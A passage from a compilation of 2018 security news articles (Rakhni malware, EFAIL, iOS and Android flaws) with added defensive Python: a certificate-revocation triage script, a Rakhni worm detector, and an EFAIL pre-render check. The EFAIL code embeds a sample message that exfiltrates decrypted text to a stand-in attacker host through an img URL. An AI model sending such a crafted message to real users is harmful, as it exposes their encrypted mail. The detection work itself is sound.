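    serial: str          # certificate serial number, hex
    effective: datetime  # revocation date published by the CA / vendor


@dataclass(frozen=True)
class SignedFile:
    sha256: str
    signer_cn: str                 # subject CN of the signing certificate
    issuer: str
    serial: str
    chain_ok: bool                 # digest matches and the chain builds to a trusted root
    timestamp: Optional[datetime]  # trusted countersignature time; None if not timestamped


# Constructed: the stolen "D-Link Corporation" certificate, revoked 2018-07-03.
REVOKED = (
    Revocation("Example Code Signing CA", "4a9f1c0000000000012345", datetime(2018, 7, 3)),
)


def triage(f: SignedFile, revoked: Iterable[Revocation] = REVOKED,
           vendor_known: FrozenSet[str] = frozenset()) -> str:
    """Classify one signed file.

    Authenticode keeps a signature valid after the certificate is revoked as
    long as it carries a trusted timestamp earlier than the revocation date.
    A stolen key was in the attackers' hands before anyone noticed, so
    'signed before revocation' proves the date, not who built the file:
    compare the hash with the vendor's own release list before trusting it.
    """
    if not f.chain_ok:
        return "INVALID"                    # tampered file, fake/untrusted root, bad digest
    if f.sha256 in vendor_known:
        return "VENDOR_KNOWN"               # hash is on the vendor's published release list
    hit = next((r for r in revoked
                if r.issuer == f.issuer and r.serial.lower() == f.serial.lower()), None)
    if hit is None:
        return "SIGNED_OK"                  # signer not on the stolen/revoked list
    if f.timestamp is None:
        return "REVOKED_NO_TIMESTAMP"       # Windows now rejects it; treat as unsigned
    if f.timestamp < hit.effective:
        return "SIGNED_BEFORE_REVOCATION"   # Windows accepts it; not vendor-known, so review
    return "SIGNED_AFTER_REVOCATION"        # made after revocation: the key is still in use


SAMPLES = (  # constructed records
    SignedFile("aa" * 32, "D-Link Corporation", "Example Code Signing CA",
               "4a9f1c0000000000012345", True, datetime(2017, 5, 10)),
    SignedFile("bb" * 32, "D-Link Corporation", "Example Code Signing CA",
               "4A9F1C0000000000012345", True, datetime(2018, 6, 20)),
    SignedFile("cc" * 32, "D-Link Corporation", "Example Code Signing CA",
               "4a9f1c0000000000012345", True, None),
    SignedFile("dd" * 32, "D-Link Corporation", "Example Code Signing CA",
               "4a9f1c0000000000012345", True, datetime(2018, 7, 10)),
    SignedFile("ee" * 32, "Example Vendor Ltd", "Example Code Signing CA",
               "5b00000000000000000999", True, datetime(2018, 7, 10)),
    SignedFile("ff" * 32, "D-Link Corporation", "Example Code Signing CA",
               "4a9f1c0000000000012345", False, datetime(2018, 6, 20)),
)
VENDOR_RELEASE_HASHES = frozenset({"aa" * 32})  # constructed: the vendor's own release


def triage_all(samples=SAMPLES, vendor_known=VENDOR_RELEASE_HASHES):
    """Verdict per sample, keyed by the first four hex chars of the hash."""
    return {s.sha256[:4]: triage(s, vendor_known=vendor_known) for s in samples}


if __name__ == "__main__":
    for k, v in triage_all().items():
        print(k, v)
```

The two verdicts that need a human are SIGNED_BEFORE_REVOCATION (Windows still trusts it, so endpoint tooling will not flag it) and SIGNED_AFTER_REVOCATION (the attackers kept signing with a revoked key, as happened with the Changing Information Technology certificate); the signer CN alone is not a trust decision in either case.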


Just using a $39 device it is possible to defeat new iOS USB Restricted Mode
11.7.2018 securityaffairs Apple

Once USB Restricted Mode is enabled on a device, no data communications occur over the Lightning port, but experts found a way to reset the countdown timer.
Apple recently released iOS 11.4.1, which introduced a new security feature, dubbed USB Restricted Mode, designed to protect devices against the USB accessories that forensic experts and law enforcement agencies use to analyze iPhones and iPads.

USB Restricted Mode first appeared in beta versions of iOS. It disables the data connection of the iPhone's Lightning port after a set interval (one hour since the device was last unlocked) without interrupting charging.

Once the mode is active, forensic hardware such as the tools made by Cellebrite and Grayshift can no longer attempt brute-force attacks via the Lightning port.


While Apple proudly announced its new feature, experts from ElcomSoft have found a way to reset the countdown timer of USB Restricted Mode and bypass the defense mechanism.

The researchers discovered that connecting a USB accessory directly to the iOS device within an hour of its last unlock resets the one-hour countdown.

Apple's own $39 Lightning to USB 3 Camera Adapter is enough to do this. The experts also found that untrusted Lightning accessories, ones that have never been paired with the iPhone, reset the timer as well.

“What we discovered is that iOS will reset the USB Restrictive Mode countdown timer even if one connects the iPhone to an untrusted USB accessory, one that has never been paired to the iPhone before (well, in fact the accessories do not require pairing at all).” reads the post published by ElcomSoft.

“In other words, once the police officer seizes an iPhone, he or she would need to immediately connect that iPhone to a compatible USB accessory to prevent USB Restricted Mode lock after one hour. Importantly, this only helps if the iPhone has still not entered USB Restricted Mode.”


ElcomSoft researchers are also testing cheap, unofficial Lightning to USB adapters against the security measure.

According to the experts, the issue could easily be fixed by Apple; it is probably nothing more than an oversight.

The feature is enabled from Settings > Face ID (or Touch ID) & Passcode > USB Accessories, by leaving the toggle off.

If you need to activate the feature immediately, before the countdown ends, press the Power button five times.


Adobe July Patch Tuesday fixes over 100 flaws in Adobe Acrobat and Reader
11.7.2018 securityaffairs Vulnerebility

Adobe released July Patch Tuesday security updates that address over 100 flaws in Acrobat and Reader, and other issues in Flash Player, Experience Manager, and Connect.
On Tuesday Adobe released its July Patch Tuesday security updates, addressing more than 100 flaws across its products: 105 vulnerabilities in Acrobat and Reader, two in Flash Player, three in Experience Manager, and three in Connect.

The Windows and macOS versions of Adobe Acrobat and Reader were affected by dozens of critical memory corruption bugs that could be exploited for remote code execution. The list includes double-free, heap overflow, use-after-free, out-of-bounds write, type confusion, untrusted pointer dereference, and buffer error vulnerabilities.

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

The July Patch Tuesday security updates also addressed a critical privilege escalation flaw and dozens of important out-of-bounds read vulnerabilities.

Many flaws fixed by Adobe were reported to the company through the Trend Micro’s Zero-Day Initiative (ZDI).

“Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address critical vulnerabilities in Adobe Flash Player 30.0.0.113 and earlier versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the advisory published by Adobe for Flash Player.

Adobe addressed three server-side request forgery (SSRF) vulnerabilities in Experience Manager that can lead to the exposure of sensitive information, and fixed authentication bypass and insecure library loading flaws in Adobe Connect. None of the Experience Manager or Connect flaws was rated critical.

The good news for Adobe customers is that the company is not aware of any in-the-wild attacks exploiting the flaws addressed by the July Patch Tuesday updates.


Trojan Either Encrypts Files or Mines for Cryptocurrency
7.7.2018 securityweek Cryptocurrency

A long-established ransomware family recently added the ability to deploy a cryptocurrency miner instead of a file encryptor, depending on the victim machine's configuration.

The malware, which Kaspersky Lab detects as Rakhni, was first discovered in 2013 and has received numerous updates ever since. The latest feature added to the threat, however, makes it stand out from the crowd: the malware’s downloader checks the victim system and decides whether to infect it with a cryptor or a miner.

Mainly affecting users in Russia but spread worldwide, the Trojan is being distributed via spam emails with a malicious Word document attached. The file has an embedded PDF document that, once opened, launches a malicious downloader and also displays a fake error message to the victim.

The malware poses as software from Adobe, and even uses a fake digital signature featuring the name Adobe Systems Incorporated.

Once executed, it performs a series of checks to determine if it runs in a virtualized environment or if it is being analyzed, creates a registry key, and checks the process count, computer name, and IP address. The downloader also checks registry keys for specific strings associated with virtual machines, sandbox and analysis tools.

After completing this exhaustive list of checks (over 200), the threat proceeds to install a root certificate from its resources. The malware also checks for anti-virus programs on the system and can disable Windows Defender if no other AV process is found.

The downloader checks if the folder %AppData%\Bitcoin is present on the machine and drops the cryptor if it exists. If not, and there are more than two logical processors, the miner is dropped. If the folder doesn’t exist and there’s only one logical processor, the malware jumps to a worm component.

The cryptor performs its own set of checks on the machine, targets over 60 processes for termination, and only starts encrypting once the system has been idle for 2 minutes. The malware targets nearly 200 file types, uses the RSA-1024 encryption algorithm, and appends the .neitrino extension to the affected files.

The miner generates a VBS script that gets launched after the system reboots, and which contains two commands to mine for Monero and Monero Original, respectively. Then, if the installation directory also contains the svchost.exe file, the malware launches it to mine for Dashcoin. A fake Microsoft certificate is used to hide the malicious process on the system.

“When this analysis was carried out, the downloader was receiving an archive with a miner that didn’t use the GPU. The attacker uses the console version of the MinerGate utility for mining,” Kaspersky explains.

The malware was also observed sending emails to a hardcoded address, providing the attackers with the computer name, IP address, the malware's path on the system, date and time, and the malware build date, in addition to details on the infection itself.

The downloader was also observed attempting to spread to other computers on the local network. For that, it gets a list of network shares and then checks each computer to see if the folder Users is shared, in an attempt to copy itself to the Startup folder of each accessible user.

The malware also creates a batch file to delete all ‘temporary’ files used during infection, a rather common behavior.


Google July 2018 Android patches fixes critical vulnerabilities
7.7.2018 securityaffairs Android

This week Google released the July 2018 Android patches that address tens of vulnerabilities in the popular mobile operating system.
Google released the July 2018 Android patches, which address a total of 11 vulnerabilities, three rated Critical and eight rated High, in the Framework, Media framework, and System components.

The critical vulnerabilities are remote code execution issues, the other flaws include information disclosure bugs, denial of service and elevation of privilege issues.

The most severe vulnerability affecting the Framework (CVE-2018-9433) could be exploited by a remote attacker using a specially crafted PAC file to execute arbitrary code within the context of a privileged process.

“The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process,” reads the security advisory.

The most severe vulnerability in the System component (CVE-2018-9365) could be exploited by a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.

The most severe vulnerability in the Media framework component (CVE-2018-9411) could be exploited by a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.

Affected Android versions are Android 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, and 8.1.


Google also addressed a total of 32 vulnerabilities as part of the 2018-07-05 security patch level: eight Critical issues and 24 rated High.

These vulnerabilities affect the Kernel (four elevation of privilege bugs), Qualcomm components (six: one Critical remote code execution flaw, one High-severity remote code execution flaw, two High-severity information disclosure issues, and two elevation of privilege bugs), and Qualcomm closed-source components (22: seven Critical and 15 High).


New Rakhni variant could infect systems with either a ransomware or a miner
7.7.2018 securityaffairs Ransomware

Security researchers at Kaspersky Labs have discovered a new strain of the Rakhni malware that could infect systems with either a ransomware or a cryptocurrency miner.
Experts from Kaspersky Labs have discovered a new strain of the Rakhni ransomware family that could infect systems with either a ransomware or a cryptocurrency miner depending upon their configurations.

“Way back in 2013 our malware analysts spotted the first malicious samples related to the Trojan-Ransom.Win32.Rakhni family.” reads the analysis published by Kaspersky.

“Now the criminals have decided to add a new feature to their creation – a mining capability. In this article we describe a downloader that decides how to infect the victim: with a cryptor or with a miner.”


The Rakhni malware is spread via spear-phishing messages carrying a weaponized Microsoft Word document as an attachment.

When the victim opens the document, it prompts them to save it and enable editing. The document contains a PDF icon which, if clicked, launches a malicious executable; on execution the malware immediately displays a fake error message box.

The message informs the victim that it is impossible to open the PDF file because a system file is missing.

In the background, the Rakhni malware runs anti-VM and anti-sandbox checks to decide whether the system is safe to infect. If it is, the malware performs further checks to decide whether to deliver the ransomware or the cryptocurrency miner.

“The decision to download the cryptor or the miner depends on the presence of the folder %AppData%\Bitcoin. If the folder exists, the downloader decides to download the cryptor.” continues the analysis.

“If the folder doesn’t exist and the machine has more than two logical processors, the miner will be downloaded. If there’s no folder and just one logical processor, the downloader jumps to its worm component, which is described below in the corresponding part of the article.”
If the target system has a ‘Bitcoin’ folder under AppData, the cryptor is delivered. Before encrypting files with the RSA-1024 encryption algorithm, the malware terminates all processes matching a predefined list of popular applications; after encryption it displays a ransom note via a text file.

If the ‘Bitcoin’ folder doesn’t exist and the machine has more than two logical processors, the malware drops the MinerGate utility to mine Monero (XMR), Monero Original (XMO) and Dashcoin (DSH) in the background.

This variant of the Rakhni malware installs a root certificate stored in its resources, and every executable it downloads is signed with that certificate. Kaspersky found fake certificates claiming to have been issued by Microsoft Corporation and Adobe Systems Incorporated; the malware uses the CertMgr.exe utility to install these fake roots, in an attempt to make the miner look like a trusted process.

If the infected system doesn’t have a ‘Bitcoin’ folder and has only a single logical processor, the malware activates the worm component that allows the malicious code to spread among all the computers in the local network using shared resources.

“As one of its last actions the downloader tries to copy itself to all the computers in the local network. To do so, it calls the system command ‘net view /all’ which will return all the shares and then the Trojan creates the list.log file containing the names of computers with shared resources” the researchers report.

“For each computer listed in the file the Trojan checks if the folder Users is shared and, if so, the malware copies itself to the folder \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup of each accessible user.”
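The worm step described in both Rakhni write-ups above (a `net view /all` share enumeration followed by copies of the downloader into each reachable user's Startup folder) is a sequence that endpoint telemetry sees as two ordinary events: a process spawning net.exe, then the same process writing an executable to a UNC path. The following added detection example, which is not Kaspersky's code, correlates the two over constructed Sysmon-style ProcessCreate and FileCreate events; hostnames, user names, PIDs and the file name update.exe are made up.

```python
"""Added example (not Kaspersky's code): correlate `net view` share enumeration
with executables written into other users' Startup folders over SMB, the
Rakhni worm behaviour. Events are constructed, Sysmon-style records."""
import re
from datetime import datetime, timedelta

# \\HOST\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\<file>
STARTUP_UNC_RE = re.compile(
    r"^\\\\(?P<share_host>[^\\]+)\\Users\\(?P<user>[^\\]+)"
    r"\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
    r"\\(?P<file>[^\\]+\.(?:exe|scr|com|bat|cmd|vbs|js|lnk))$",
    re.IGNORECASE,
)

EVENTS = [  # constructed: one infected host (WS-042) and one admin host (WS-007)
    {"ts": "2018-07-03T10:00:01", "host": "WS-042", "type": "ProcessCreate", "pid": 4120, "ppid": 3980,
     "image": r"C:\Windows\System32\net.exe", "cmdline": "net view /all"},
    {"ts": "2018-07-03T10:00:09", "host": "WS-042", "type": "FileCreate", "pid": 3980,
     "image": r"C:\Users\bob\AppData\Local\Temp\update.exe",
     "target": r"\\FS-01\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"},
    {"ts": "2018-07-03T10:00:12", "host": "WS-042", "type": "FileCreate", "pid": 3980,
     "image": r"C:\Users\bob\AppData\Local\Temp\update.exe",
     "target": r"\\WS-017\Users\carol\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"},
    {"ts": "2018-07-03T10:00:15", "host": "WS-042", "type": "FileCreate", "pid": 3980,
     "image": r"C:\Users\bob\AppData\Local\Temp\update.exe",
     "target": r"\\FS-01\Users\alice\Documents\list.log"},  # not a Startup path
    {"ts": "2018-07-03T11:30:00", "host": "WS-042", "type": "FileCreate", "pid": 3980,
     "image": r"C:\Users\bob\AppData\Local\Temp\update.exe",
     "target": r"\\WS-020\Users\erin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"},
    {"ts": "2018-07-03T10:05:00", "host": "WS-007", "type": "ProcessCreate", "pid": 512, "ppid": 500,
     "image": r"C:\Windows\System32\net.exe", "cmdline": r"net view \\FS-01"},  # admin, no copies
    {"ts": "2018-07-03T10:06:00", "host": "WS-007", "type": "FileCreate", "pid": 900,
     "image": r"C:\Windows\explorer.exe",
     "target": r"\\FS-01\Users\dave\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vpn.lnk"},
]


def _ts(s: str) -> datetime:
    return datetime.fromisoformat(s)


def detect_startup_worm(events, window: timedelta = timedelta(minutes=10)):
    """One alert per (host, pid) where a process spawned `net view` and then,
    within `window`, wrote an executable into a Startup folder over a UNC path.
    Tying the copies to the parent of net.exe keeps an admin's own `net view`
    or a shortcut pushed by another process from firing."""
    recon = {}  # (host, parent pid of net.exe) -> time of the first `net view`
    for e in events:
        if (e["type"] == "ProcessCreate"
                and e["image"].lower().endswith("\\net.exe")
                and re.search(r"\bview\b", e["cmdline"], re.IGNORECASE)):
            recon.setdefault((e["host"], e["ppid"]), _ts(e["ts"]))

    alerts = {}
    for e in events:
        if e["type"] != "FileCreate":
            continue
        m = STARTUP_UNC_RE.match(e["target"])
        if m is None:
            continue
        key = (e["host"], e["pid"])
        started = recon.get(key)
        if started is None or not (timedelta(0) <= _ts(e["ts"]) - started <= window):
            continue
        alert = alerts.setdefault(key, {
            "host": e["host"], "pid": e["pid"], "image": e["image"],
            "net_view_at": started.isoformat(), "targets": []})
        alert["targets"].append((m["share_host"], m["user"], m["file"]))
    return sorted(alerts.values(), key=lambda a: (a["host"], a["pid"]))


if __name__ == "__main__":
    for a in detect_startup_worm(EVENTS):
        print(f"{a['host']} pid {a['pid']} ({a['image']}) ran net view at {a['net_view_at']} "
              f"and wrote to {len(a['targets'])} remote Startup folder(s): {a['targets']}")
```

The 11:30 write to WS-020 falls outside the default ten-minute window and is dropped; widen the window when the downloader is known to sleep between hosts, at the cost of more correlation state per host.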

The experts also noticed that the malware implements spyware capabilities.

Most of the infections are in Russia (95.5%), other systems infected with the malware are in Kazakhstan (1.36%), Ukraine (0.57%), Germany (0.49%), and India (0.41%) as well.

Further details including the IoCs are reported in the analysis published by Kaspersky.


Ex-NSO Employee Accused of Stealing Spyware Source Code
6.7.2018 securityweek Virus

A former employee of Israel-based cyber arms dealer NSO Group has been accused of stealing spyware source code from the company and attempting to sell it for $50 million, Israel’s Justice Ministry announced this week.

The suspect has not been named, but court documents reveal that he’s a 38-year-old from Netanya hired by NSO as a senior programmer in the company's automation team.

According to prosecutors, NSO informs employees that they are prohibited from copying any software from work devices, a rule that is enforced using a McAfee product that can prevent external storage units from being connected to computers.

Investigators claim that the suspect searched the Web for ways to bypass the security product, methods which he used to copy both NSO software and its source code following a poor performance review from his manager.

The suspect then allegedly searched the Internet for potential buyers of the spyware. He is said to have attempted to sell the files for $50 million in cryptocurrency on the dark web, but his potential buyer alerted NSO, which led to the employee’s dismissal and arrest. Investigators found the stolen files on an external drive hidden under a mattress in the suspect’s home.

Court documents show that the suspect told the potential buyer that he was a hacker who had broken into NSO’s systems.

Authorities allege that the defendant’s actions could have harmed state security and could have led to NSO’s collapse. However, the firm told Israeli media that the stolen files were not shared with a third party.

NSO Group, a company owned by US private equity firm Francisco Partners Management, is best known for Pegasus and Chrysaor, tools designed for spying on iOS and Android phones, respectively.

In 2016, Apple released an emergency patch for iOS after researchers discovered that Pegasus had been exploiting three zero-day vulnerabilities in the mobile operating system.

NSO claims to sell its tools only to governments to help them in their fight against terrorists and criminals. However, Pegasus has apparently been abused in some cases, including in Mexico, where the government was accused last year of using it to spy on journalists and activists.

According to recent reports, Verint Systems is in talks to acquire NSO for roughly $1 billion.


Vietnam Activists Flock to 'Safe' Social Media After Cyber Crackdown
6.7.2018 securityweek Social

Tens of thousands of Vietnamese social media users are flocking to a self-professed free speech platform to avoid tough internet controls in a new cybersecurity law, activists told AFP.

The draconian law requires internet companies to scrub critical content and hand over user data if Vietnam's Communist government demands it.

The bill, which is due to take effect from January 1, sparked outcry from activists, who say it is a chokehold on free speech in a country where there is no independent press and where Facebook is a crucial lifeline for bloggers.

The world's leading social media site has 53 million users in Vietnam, a country of 93 million.

Many activists are now turning to Minds, a US-based open-source platform, fearing Facebook could be complying with the new rules.

"We want to keep our independent voice and we also want to make a point to Facebook that we're not going to accept any censorship," Tran Vi, editor of activist site The Vietnamese, which is blocked in Vietnam, told AFP from Taiwan.

Some activists say they migrated to Minds after content removal and abuse from pro-government Facebook users.

Two editors' Facebook accounts were temporarily blocked and The Vietnamese Facebook page can no longer use the "instant article" tool to post stories.

Nguyen Chi Tuyen, an activist better known by his online handle Anh Chi, says he has moved to Minds as a secure alternative, though he will continue using Facebook and Twitter.

"It's more anonymous and a secretive platform," he said of Minds.

He has previously had to hand over personal details to Facebook to verify his identity and now fears that information could be used against him.

- 'Scary' law -

About 100,000 new active users have registered in Vietnam in less than a week, many posting on politics and current affairs, Minds founder and CEO Bill Ottman told AFP.

"This new cybersecurity law is scaring a lot of people for good reason," he said from Connecticut.

"It's certainly scary to think that you could not only be censored but have your private conversations given to a government that you don't know what they're going to use that for."

The surge of new users from Vietnam now accounts for nearly 10 percent of Minds total user base of about 1.1 million.

Users are not required to register with personal data and all chats are encrypted.

Vietnam's government last year announced a 10,000-strong cybersecurity army tasked with monitoring incendiary material online.

In its unabashed defence of the new law, Vietnam has said it is aimed at protecting the regime and avoiding a "colour revolution", but refused to comment to AFP on Thursday.

Facebook told AFP it is reviewing the law and says it considers government requests to take down information in line with its Community Standards -- and pushes back when possible.

Google declined to comment on the new law when asked by AFP, but their latest Transparency report showed that it had received 67 separate requests from the Vietnamese government to remove more than 6,500 items since 2009, the majority since early last year.

Most were taken down, though Google does not provide precise data on content removal compliance.

Ottman says countries like Vietnam are fighting a losing battle trying to control online expression.

"It's like burning books, it just causes more attention to be brought to those issues and it further radicalises those users because they're so upset that they're getting censored," he said.


Chinese hackers breached systems at Australian National University … and are still there
6.7.2018 securityaffairs BigBrothers

Chinese hackers breached the systems of the Australian National University (ANU) and, according to the experts, they are still there.
Chinese hackers continue to target organizations worldwide. This time, attackers based in China breached the systems of the Australian National University (ANU), one of the most prestigious Australian universities.

The bad news is that experts are still working to lock the hackers out because the threat is still active in the network of the Australian University.

“The ABC has been told the Australian National University (ANU) system was first compromised last year.” reported the ABC news.

The ANU had been working with intelligence agencies for several months to contain the threat and minimize its impact.

“The university has been working in partnership with Australian government agencies for several months to minimise the impact of this threat, and we continue to seek and take advice from Australian government agencies,” reads the official statement published by the Australian National University.

“Current assessments indicate no staff, student or research information has been taken and counter-measures are being undertaken.”


The Cyber Security Minister Angus Taylor pointed out that the Australian Government “condemns any malicious activity” that targets the systems of the country.

“We know that nation states and criminal groups actively target research and tertiary institutions to steal the intellectual property of hardworking Australians,” he said.

“Malicious cyber activity against Australia’s national interests, whether from criminal syndicates or foreign states, is increasing in frequency, sophistication and severity, and the Australian Government’s highest priority is ensuring Australians are safe and our interests are secure.”

Mr Taylor confirmed that the Australian Cyber Security Centre (ACSC) had been supporting ANU in this case.

“The Australian Cyber Security Centre works closely with any affected organisations to reduce the likelihood of threat actors being successful and to help them recover when they are compromised,” he said.

Australian systems are a constant target: in October 2016 a report published by the Australian Cyber Security Centre confirmed that the Australian Bureau of Meteorology hack was the work of foreign cyber spies.

In December 2015 the Australian Broadcasting Corporation (ABC) revealed that a supercomputer operated by the Australian Bureau of Meteorology (BoM) was hit by a cyber attack. The Bureau of Meteorology is Australia’s national weather, climate, and water agency, it is the analog of the USA’s National Weather Service.

The Bureau of Meteorology supercomputer targeted by the hackers is also used to provide weather data to defense agencies; access to that data could give a persistent attacker a significant advantage for numerous reasons.

Initial media reports blamed China for the cyber attack. Back in 2013, Chinese hackers were accused by the authorities of stealing the top-secret documents and blueprints of Australia’s new intelligence agency headquarters.


Hamas cyber-operatives lure Israeli soldiers to spyware hidden in tainted apps
6.7.2018 securityaffairs BigBrothers

Israeli military intelligence accused Hamas operatives of creating tainted apps to lure soldiers into downloading spyware onto their phones.
According to a report published by the Israeli military, Hamas hackers are attempting to lure Israel Defence Forces (IDF) soldiers into installing tainted apps on their devices.

The Israeli military had already blamed Hamas for similar attacks, but this time the hackers managed to serve the apps through the official Google Play Store to increase the likelihood of success.

The experts from the Israel firm ClearSky have identified the following apps:

WinkChat – com.winkchat.apk (dating app)
GlanceLove – com.coder.glancelove.apk (dating app)
Golden Cup – anew.football.cup.world.com.worldcup.apk (World Cup app)

Hamas operatives created a number of fake Facebook profiles using photos of attractive women to lure IDF soldiers into private conversations, then trick them into installing one of the compromised apps.

Israeli military officials explained that Hamas operatives adopted the same tactic in a campaign launched in January.

In January, the hackers used the profile of a woman named “Elianna Amer,” in these last attacks, that lasted at least for three months, they used the profile of a woman named “Lina Kramer.”

“I got a message on Facebook that looked innocent at first, from someone named Lina Kramer, we started talking on Facebook, then we moved to Whatsapp, and then she asked me to download an app called GlanceLove,” explained a former IDF soldier.

“At this stage, my suspicion was final, and I decided to consult a friend who helped me understand that it was a fictitious profile with malicious intentions. From there I turned to the information security officer in my unit who helped me.”

According to Israeli army intelligence officers, the attacks failed to damage military security.

“No damage was done, as we stopped it in time,” one of the officers said.

The Israeli newspaper Haaretz provided a different version of the facts, reporting that at least “hundreds” of soldiers were infected.

“Hamas managed to hack into the phones of hundreds of Israeli soldiers using dating and World Cup apps and managed to gather sensitive information about the military and some of its bases around the Gaza strip.” reported Haaretz.

“The apps allowed malicious software controlled by Hamas to be planted into Android smartphones, enabling militants in the Strip to access pictures, phone numbers and email addresses of soldiers posted close to the border, and even allowed Hamas to control the phones’ cameras and microphones remotely.”

The analysis of the apps revealed they were tainted with a spyware that can take over devices and exfiltrate sensitive data.

According to the experts, the threat actor behind these attacks is codenamed Arid Viper.

In 2015, security experts at Trend Micro uncovered a cyber espionage campaign, dubbed Operation Arid Viper, that targeted Israeli institutions. The operation was run by Arabic-speaking hackers who sought to extract sensitive documents by sending phishing emails; the phishing campaigns targeted government offices, infrastructure providers, a military organization, and academic institutions in Israel and Kuwait.

In the past, security experts linked Hamas operatives to another APT tracked as Gaza Cybergang (Gaza Hackers Team or Molerats).


Thunderbird Version 52.9 addresses several issues, including the EFAIL flaw
6.7.2018 securityaffairs Vulnerebility

The Thunderbird team released a new version of the popular email client that addresses many security issues, including the EFAIL vulnerability.
Thunderbird has released a new version to address a dozen security vulnerabilities, including the EFAIL encryption issue that was discovered in May.

The new version addresses two EFAIL-related issues in the way Thunderbird handles encrypted messages.

“The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs.” reads the blog post published by the researchers that discovered the EFAIL flaw.

“To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.”

Thunderbird 52.9 addresses CVE-2018-12372, a flaw that let attackers build S/MIME and PGP decryption oracles out of HTML messages.

“Decrypted S/MIME parts, when included in HTML crafted for an attack, can leak plaintext when included in a HTML reply/forward.” reads the security advisory published by the Mozilla Foundation.

The new version also fixes the CVE-2018-12373 flaw that could result in the leakage of S/MIME plaintext when a message is forwarded.
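The mechanism the EFAIL researchers describe above (active HTML content wrapped around a captured ciphertext so that the decrypted plaintext becomes part of a requested URL) has a recognisable MIME shape: an HTML part that ends inside an open tag, immediately followed by the encrypted part, followed by an HTML part that closes the tag. The following added example, which is not the EFAIL researchers' or Thunderbird's code, builds that shape as a constructed PGP/MIME sample and implements a pre-render check that flags it, alongside a benign S/MIME message that must pass. The ciphertexts are placeholder strings (no real keys), and attacker.example.invalid is a made-up host.

```python
"""Added example (not the EFAIL researchers' or Thunderbird's code): the
EFAIL 'direct exfiltration' message shape as a constructed MIME sample, and a
pre-render check that spots it. Ciphertexts are placeholders, the attacker
host is made up."""
from email import message_from_string
from email.policy import default as default_policy

# Constructed sample. Part 1 opens an <img src="..."> attribute and never closes it,
# part 2 is the victim's own encrypted message (captured earlier by the attacker),
# part 3 closes the attribute. A client that decrypts part 2 and renders the three
# parts as one HTML document requests http://attacker.example.invalid/exfil?d=<plaintext>.
EFAIL_SAMPLE = """\
From: someone@example.invalid
To: victim@example.invalid
Subject: Re: contract
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="outer"

--outer
Content-Type: text/html; charset="us-ascii"

<img src="http://attacker.example.invalid/exfil?d=
--outer
Content-Type: multipart/encrypted; protocol="application/pgp-encrypted"; boundary="inner"

--inner
Content-Type: application/pgp-encrypted

Version: 1
--inner
Content-Type: application/octet-stream

-----BEGIN PGP MESSAGE-----

hQEMA0PLACEHOLDERCIPHERTEXTnotARealMessage0=
=AbCd
-----END PGP MESSAGE-----
--inner--
--outer
Content-Type: text/html; charset="us-ascii"

">
--outer--
"""

# Constructed benign message: a complete HTML part followed by an S/MIME part.
BENIGN_SAMPLE = """\
From: alice@example.invalid
To: bob@example.invalid
Subject: report
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="outer"

--outer
Content-Type: text/html; charset="us-ascii"

<p>Encrypted report attached.</p>
--outer
Content-Type: application/pkcs7-mime; smime-type=enveloped-data; name="smime.p7m"
Content-Transfer-Encoding: base64

MIAGCSqGSIb3DQEHA6CAMIACAQAxggEwPLACEHOLDERnotRealCms=
--outer--
"""


def parse(raw: str):
    """Parse raw RFC 5322 text into an EmailMessage tree."""
    return message_from_string(raw, policy=default_policy)


def is_encrypted_part(part) -> bool:
    """PGP/MIME (RFC 3156) or S/MIME enveloped data (RFC 8551)."""
    ctype = part.get_content_type()
    if ctype == "multipart/encrypted":
        return True
    if ctype in ("application/pkcs7-mime", "application/x-pkcs7-mime"):
        return (part.get_param("smime-type") or "").lower() == "enveloped-data"
    return False


def html_ends_open(html: str) -> bool:
    """True if the fragment ends inside a tag (its last '<' has no matching '>'),
    so whatever is rendered after it is swallowed into that tag or attribute."""
    text = html.rstrip()
    return text.rfind("<") > text.rfind(">")


def find_efail_wrappers(msg):
    """Return (index, html_ctype, encrypted_ctype) for every HTML sibling that
    ends inside a tag and is immediately followed by an encrypted sibling."""
    hits = []
    for container in msg.walk():
        if not container.is_multipart() or container.get_content_type() == "multipart/encrypted":
            continue  # leaf parts, and the two halves of a PGP/MIME part, are not siblings to check
        siblings = list(container.iter_parts())
        for i in range(len(siblings) - 1):
            a, b = siblings[i], siblings[i + 1]
            if (a.get_content_type() == "text/html" and is_encrypted_part(b)
                    and html_ends_open(a.get_content())):
                hits.append((i, a.get_content_type(), b.get_content_type()))
    return hits


if __name__ == "__main__":
    print("efail sample:", find_efail_wrappers(parse(EFAIL_SAMPLE)))
    print("benign sample:", find_efail_wrappers(parse(BENIGN_SAMPLE)))
```

The check is a gateway or pre-render heuristic, not a fix: the client-side fix that the Thunderbird advisories describe is not to merge decrypted output into the surrounding HTML rendering context and not to load remote content from it, which closes the channel regardless of how the wrapping parts are arranged.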

Thunderbird 52.9 also addresses some critical flaws, such as CVE-2018-12359, a buffer overflow vulnerability that could be exploited to crash a vulnerable system.

“A buffer overflow can occur when rendering canvas content while adjusting the height and width of the <canvas> element dynamically, causing data to be written outside of the currently computed boundaries.”


